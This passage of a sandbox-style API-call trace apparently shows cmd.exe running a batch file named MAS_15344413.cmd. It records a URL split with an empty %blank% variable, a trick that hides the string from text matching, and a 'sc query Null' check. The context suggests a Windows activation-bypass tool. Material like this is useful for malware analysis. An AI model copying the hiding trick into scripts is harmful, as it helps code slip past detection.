14 [0174.724] _wcsicmp (_String1="set", _String2="SET") returned 0 [0174.724] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0174.724] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0174.724] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0174.724] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0174.724] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0174.725] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0174.725] _wcsicmp (_String1="set", _String2="CD") returned 16 [0174.725] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0174.725] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0174.725] _wcsicmp (_String1="set", _String2="REN") returned 1 [0174.725] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0174.725] _wcsicmp (_String1="set", _String2="SET") returned 0 [0174.725] GetProcessHeap () returned 0x19a8f1e0000 [0174.725] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0d70 [0174.725] GetProcessHeap () returned 0x19a8f1e0000 [0174.725] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e0d70, Size=0x24) returned 0x19a8f1eb8f0 [0174.725] GetProcessHeap () returned 0x19a8f1e0000 [0174.725] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb8f0) returned 0x24 [0174.725] wcsncmp (_String1="\"bla", _String2="/", _MaxCount=0x4) returned -13 [0174.725] GetProcessHeap () returned 0x19a8f1e0000 [0174.725] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x2c) returned 0x19a8f1e0ff0 [0174.725] _wcsnicmp (_String1="\"b", _String2="/A", _MaxCount=0x2) returned -13 [0174.726] _wcsnicmp (_String1="\"b", _String2="/P", _MaxCount=0x2) returned -13 [0174.726] SetEnvironmentVariableW (lpName="blank", lpValue=0x0) returned 1 [0174.726] GetProcessHeap () returned 0x19a8f1e0000 [0174.726] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ed050) returned 1 [0174.726] GetEnvironmentStringsW () returned 0x19a8f1ea4b0* [0174.726] GetProcessHeap () returned 0x19a8f1e0000 [0174.726] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xae0) returned 0x19a8f1ece20 [0174.726] memcpy (in: _Dst=0x19a8f1ece20, _Src=0x19a8f1ea4b0, _Size=0xae0 | out: _Dst=0x19a8f1ece20) returned 0x19a8f1ece20 [0174.726] FreeEnvironmentStringsA (penv="=") returned 1 [0174.726] _get_osfhandle (_FileHandle=1) returned 0x24 [0174.726] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0174.727] _get_osfhandle (_FileHandle=1) returned 0x24 [0174.727] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0174.727] _get_osfhandle (_FileHandle=0) returned 0x20 [0174.728] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0174.728] SetConsoleInputExeNameW () returned 0x1 [0174.728] GetConsoleOutputCP () returned 0x1b5 [0174.728] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0174.729] SetThreadUILanguage (LangId=0x0) returned 0x409 [0174.729] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.729] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.729] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.729] SetFilePointer (in: hFile=0x88, lDistanceToMove=2142, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x85e [0174.729] GetProcessHeap () returned 0x19a8f1e0000 [0174.730] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0ff0) returned 1 [0174.730] GetProcessHeap () returned 0x19a8f1e0000 [0174.730] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0174.730] GetProcessHeap () returned 0x19a8f1e0000 [0174.731] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0174.731] GetProcessHeap () returned 0x19a8f1e0000 [0174.731] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5950) returned 1 [0174.731] GetProcessHeap () returned 0x19a8f1e0000 [0174.731] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee0d0) returned 1 [0174.731] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.731] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x85e [0174.731] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.731] SetFilePointer (in: hFile=0x88, lDistanceToMove=2197, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x895 [0174.731] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"mas=ht%blank%tps%blank%://mass%blank%grave.dev/\"\r\n", cbMultiByte=55, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set \"mas=ht%blank%tps%blank%://mass%blank%grave.dev/\"\r\n===================================================================================\r\n") returned 55 [0174.732] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.732] GetFileType (hFile=0x88) returned 0x1 [0174.732] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.732] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x895 [0174.732] GetProcessHeap () returned 0x19a8f1e0000 [0174.732] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.732] GetProcessHeap () returned 0x19a8f1e0000 [0174.732] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f1fe1c0 [0174.732] GetProcessHeap () returned 0x19a8f1e0000 [0174.732] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb860 [0174.732] GetEnvironmentVariableW (in: lpName="blank", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0174.732] _wcsicmp (_String1="blank", _String2="CD") returned -1 [0174.732] _wcsicmp (_String1="blank", _String2="ERRORLEVEL") returned -3 [0174.732] _wcsicmp (_String1="blank", _String2="CMDEXTVERSION") returned -1 [0174.732] _wcsicmp (_String1="blank", _String2="CMDCMDLINE") returned -1 [0174.732] _wcsicmp (_String1="blank", _String2="DATE") returned -2 [0174.732] _wcsicmp (_String1="blank", _String2="TIME") returned -18 [0174.732] _wcsicmp (_String1="blank", _String2="RANDOM") returned -16 [0174.732] _wcsicmp (_String1="blank", _String2="HIGHESTNUMANODENUMBER") returned -6 [0174.732] GetProcessHeap () returned 0x19a8f1e0000 [0174.732] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0174.732] GetProcessHeap () returned 0x19a8f1e0000 [0174.733] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fe1c0) returned 1 [0174.733] GetProcessHeap () returned 0x19a8f1e0000 [0174.733] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f1fe1c0 [0174.733] GetProcessHeap () returned 0x19a8f1e0000 [0174.733] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb6b0 [0174.733] GetEnvironmentVariableW (in: lpName="blank", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0174.733] _wcsicmp (_String1="blank", _String2="CD") returned -1 [0174.733] _wcsicmp (_String1="blank", _String2="ERRORLEVEL") returned -3 [0174.733] _wcsicmp (_String1="blank", _String2="CMDEXTVERSION") returned -1 [0174.733] _wcsicmp (_String1="blank", _String2="CMDCMDLINE") returned -1 [0174.733] _wcsicmp (_String1="blank", _String2="DATE") returned -2 [0174.733] _wcsicmp (_String1="blank", _String2="TIME") returned -18 [0174.733] _wcsicmp (_String1="blank", _String2="RANDOM") returned -16 [0174.733] _wcsicmp (_String1="blank", _String2="HIGHESTNUMANODENUMBER") returned -6 [0174.733] GetProcessHeap () returned 0x19a8f1e0000 [0174.734] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0174.734] GetProcessHeap () returned 0x19a8f1e0000 [0174.734] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fe1c0) returned 1 [0174.734] GetProcessHeap () returned 0x19a8f1e0000 [0174.734] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f1fe1c0 [0174.734] GetProcessHeap () returned 0x19a8f1e0000 [0174.734] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb9e0 [0174.734] GetEnvironmentVariableW (in: lpName="blank", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0174.734] _wcsicmp (_String1="blank", _String2="CD") returned -1 [0174.734] _wcsicmp (_String1="blank", _String2="ERRORLEVEL") returned -3 [0174.734] _wcsicmp (_String1="blank", _String2="CMDEXTVERSION") returned -1 [0174.734] _wcsicmp (_String1="blank", _String2="CMDCMDLINE") returned -1 [0174.734] _wcsicmp (_String1="blank", _String2="DATE") returned -2 [0174.734] _wcsicmp (_String1="blank", _String2="TIME") returned -18 [0174.734] _wcsicmp (_String1="blank", _String2="RANDOM") returned -16 [0174.735] _wcsicmp (_String1="blank", _String2="HIGHESTNUMANODENUMBER") returned -6 [0174.735] GetProcessHeap () returned 0x19a8f1e0000 [0174.735] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0174.735] GetProcessHeap () returned 0x19a8f1e0000 [0174.735] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fe1c0) returned 1 [0174.736] GetProcessHeap () returned 0x19a8f1e0000 [0174.736] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.736] _wcsicmp (_String1="set", _String2=")") returned 74 [0174.736] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0174.736] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0174.736] _wcsicmp (_String1="IF", _String2="set") returned -10 [0174.736] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0174.736] _wcsicmp (_String1="REM", _String2="set") returned -1 [0174.736] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0174.736] GetProcessHeap () returned 0x19a8f1e0000 [0174.736] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edf50 [0174.736] GetProcessHeap () returned 0x19a8f1e0000 [0174.736] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1e5950 [0174.736] GetProcessHeap () returned 0x19a8f1e0000 [0174.737] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4c) returned 0x19a8f1f8be0 [0174.737] _tell (_FileHandle=3) returned 2197 [0174.737] _close (_FileHandle=3) returned 0 [0174.737] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0174.737] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0174.737] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0174.737] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0174.737] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0174.737] _wcsicmp (_String1="set", _String2="CD") returned 16 [0174.737] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0174.737] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0174.737] _wcsicmp (_String1="set", _String2="REN") returned 1 [0174.737] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0174.737] _wcsicmp (_String1="set", _String2="SET") returned 0 [0174.737] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0174.738] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0174.738] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0174.738] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0174.738] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0174.738] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0174.738] _wcsicmp (_String1="set", _String2="CD") returned 16 [0174.738] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0174.738] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0174.738] _wcsicmp (_String1="set", _String2="REN") returned 1 [0174.738] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0174.738] _wcsicmp (_String1="set", _String2="SET") returned 0 [0174.738] GetProcessHeap () returned 0x19a8f1e0000 [0174.738] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x88) returned 0x19a8f1ed910 [0174.739] GetProcessHeap () returned 0x19a8f1e0000 [0174.739] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ed910, Size=0x4c) returned 0x19a8f1ed910 [0174.739] GetProcessHeap () returned 0x19a8f1e0000 [0174.739] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ed910) returned 0x4c [0174.739] wcsncmp (_String1="\"mas", _String2="/", _MaxCount=0x4) returned -13 [0174.739] GetProcessHeap () returned 0x19a8f1e0000 [0174.739] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x54) returned 0x19a8f1f86a0 [0174.739] _wcsnicmp (_String1="\"m", _String2="/A", _MaxCount=0x2) returned -13 [0174.739] _wcsnicmp (_String1="\"m", _String2="/P", _MaxCount=0x2) returned -13 [0174.739] SetEnvironmentVariableW (lpName="mas", lpValue="https://massgrave.dev/") returned 1 [0174.739] GetProcessHeap () returned 0x19a8f1e0000 [0174.739] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ece20) returned 1 [0174.739] GetEnvironmentStringsW () returned 0x19a8f1ea4b0* [0174.740] GetProcessHeap () returned 0x19a8f1e0000 [0174.740] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb16) returned 0x19a8f1eeb50 [0174.740] memcpy (in: _Dst=0x19a8f1eeb50, _Src=0x19a8f1ea4b0, _Size=0xb16 | out: _Dst=0x19a8f1eeb50) returned 0x19a8f1eeb50 [0174.740] FreeEnvironmentStringsA (penv="=") returned 1 [0174.740] _get_osfhandle (_FileHandle=1) returned 0x24 [0174.740] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0174.740] _get_osfhandle (_FileHandle=1) returned 0x24 [0174.740] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0174.741] _get_osfhandle (_FileHandle=0) returned 0x20 [0174.741] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0174.741] SetConsoleInputExeNameW () returned 0x1 [0174.741] GetConsoleOutputCP () returned 0x1b5 [0174.742] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0174.742] SetThreadUILanguage (LangId=0x0) returned 0x409 [0174.742] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.743] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.743] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.743] SetFilePointer (in: hFile=0x88, lDistanceToMove=2197, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x895 [0174.743] GetProcessHeap () returned 0x19a8f1e0000 [0174.743] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f86a0) returned 1 [0174.743] GetProcessHeap () returned 0x19a8f1e0000 [0174.744] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ed910) returned 1 [0174.744] GetProcessHeap () returned 0x19a8f1e0000 [0174.744] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8be0) returned 1 [0174.744] GetProcessHeap () returned 0x19a8f1e0000 [0174.744] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5950) returned 1 [0174.744] GetProcessHeap () returned 0x19a8f1e0000 [0174.745] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edf50) returned 1 [0174.745] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.745] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x895 [0174.745] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.745] SetFilePointer (in: hFile=0x88, lDistanceToMove=2199, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x897 [0174.745] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\nt \"mas=ht%blank%tps%blank%://mass%blank%grave.dev/\"\r\n===================================================================================\r\n") returned 2 [0174.745] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.745] GetFileType (hFile=0x88) returned 0x1 [0174.745] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.745] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x897 [0174.745] GetProcessHeap () returned 0x19a8f1e0000 [0174.746] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.746] GetProcessHeap () returned 0x19a8f1e0000 [0174.746] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.746] _tell (_FileHandle=3) returned 2199 [0174.746] _close (_FileHandle=3) returned 0 [0174.746] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.747] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.747] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.747] SetFilePointer (in: hFile=0x88, lDistanceToMove=2199, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x897 [0174.747] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.747] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x897 [0174.747] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.747] SetFilePointer (in: hFile=0x88, lDistanceToMove=2274, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e2 [0174.747] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":: Check if Null service is working, it's important for the batch script\r\n", cbMultiByte=75, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=":: Check if Null service is working, it's important for the batch script\r\n===============================================================\r\n") returned 75 [0174.747] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.747] GetFileType (hFile=0x88) returned 0x1 [0174.747] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.747] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e2 [0174.747] GetProcessHeap () returned 0x19a8f1e0000 [0174.747] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.747] GetProcessHeap () returned 0x19a8f1e0000 [0174.748] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.748] _tell (_FileHandle=3) returned 2274 [0174.748] _close (_FileHandle=3) returned 0 [0174.748] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.748] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.749] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.749] SetFilePointer (in: hFile=0x88, lDistanceToMove=2274, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e2 [0174.749] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.749] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e2 [0174.749] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.749] SetFilePointer (in: hFile=0x88, lDistanceToMove=2276, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e4 [0174.749] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n Check if Null service is working, it's important for the batch script\r\n===============================================================\r\n") returned 2 [0174.749] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.749] GetFileType (hFile=0x88) returned 0x1 [0174.749] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.749] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e4 [0174.749] GetProcessHeap () returned 0x19a8f1e0000 [0174.749] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.749] GetProcessHeap () returned 0x19a8f1e0000 [0174.750] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.750] _tell (_FileHandle=3) returned 2276 [0174.750] _close (_FileHandle=3) returned 0 [0174.750] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.751] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.751] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.751] SetFilePointer (in: hFile=0x88, lDistanceToMove=2276, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e4 [0174.751] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.751] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e4 [0174.751] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.751] SetFilePointer (in: hFile=0x88, lDistanceToMove=2311, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x907 [0174.751] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="sc query Null | find /i \"RUNNING\"\r\n", cbMultiByte=35, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="sc query Null | find /i \"RUNNING\"\r\ng, it's important for the batch script\r\n===============================================================\r\n") returned 35 [0174.752] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.752] GetFileType (hFile=0x88) returned 0x1 [0174.752] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.752] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x907 [0174.752] GetProcessHeap () returned 0x19a8f1e0000 [0174.752] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.752] GetProcessHeap () returned 0x19a8f1e0000 [0174.752] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.752] _wcsicmp (_String1="sc", _String2=")") returned 74 [0174.752] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0174.752] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0174.752] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0174.753] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0174.753] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0174.753] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0174.753] GetProcessHeap () returned 0x19a8f1e0000 [0174.753] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee550 [0174.753] GetProcessHeap () returned 0x19a8f1e0000 [0174.753] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1e5950 [0174.753] GetProcessHeap () returned 0x19a8f1e0000 [0174.753] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x2a) returned 0x19a8f1e0d30 [0174.753] GetProcessHeap () returned 0x19a8f1e0000 [0174.753] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee0d0 [0174.753] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0174.753] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0174.753] 